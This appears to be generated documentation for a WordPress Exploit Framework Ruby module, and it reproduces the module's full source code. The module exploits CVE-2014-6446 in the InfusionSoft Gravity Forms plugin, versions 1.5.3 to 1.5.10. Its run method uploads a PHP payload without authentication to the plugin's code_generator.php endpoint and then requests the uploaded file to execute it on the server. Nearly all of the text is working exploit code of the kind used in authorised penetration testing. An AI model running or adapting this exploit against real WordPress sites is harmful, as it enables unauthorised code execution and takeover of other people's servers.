class Wpxf::Exploit::InfusionsoftShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 6 def initialize super update_info( name: 'InfusionSoft Shell Upload', desc: 'This module exploits a file upload vulnerability in versions '\ '1.5.3 to 1.5.10 of the InfusionSoft Gravity Forms plugin which '\ 'allows unauthenticated users to upload and execute PHP scripts '\ 'in the context of the web server.', author: [ 'g0blin', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['CVE', '2014-6446'], ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'], ['WPVDB', '7634'] ], date: 'Sep 25 2014' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 28 def check check_plugin_version_from_readme('infusionsoft', '1.5.11', '1.5.3') end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 32 def plugin_url normalize_uri(wordpress_url_plugins, 'infusionsoft') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 40 def run return false unless super emit_info 'Preparing payload...' payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php" body = { 'fileNamePattern' => payload_name, 'fileTemplate' => payload.encoded } emit_info 'Uploading payload...' res = execute_post_request(url: uploader_url, body: body) if res.nil? || res.timed_out? emit_error 'No response from the target' return false end if res.code != 200 || res.body !~ /Creating File/i emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true emit_error 'Failed to upload payload' return false end payload_url = normalize_uri(plugin_url, 'Infusionsoft', 'utilities', payload_name) emit_success "Uploaded the payload to #{payload_url}", true emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end return true end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb, line 36 def uploader_url normalize_uri(plugin_url, 'Infusionsoft', 'utilities', 'code_generator.php') end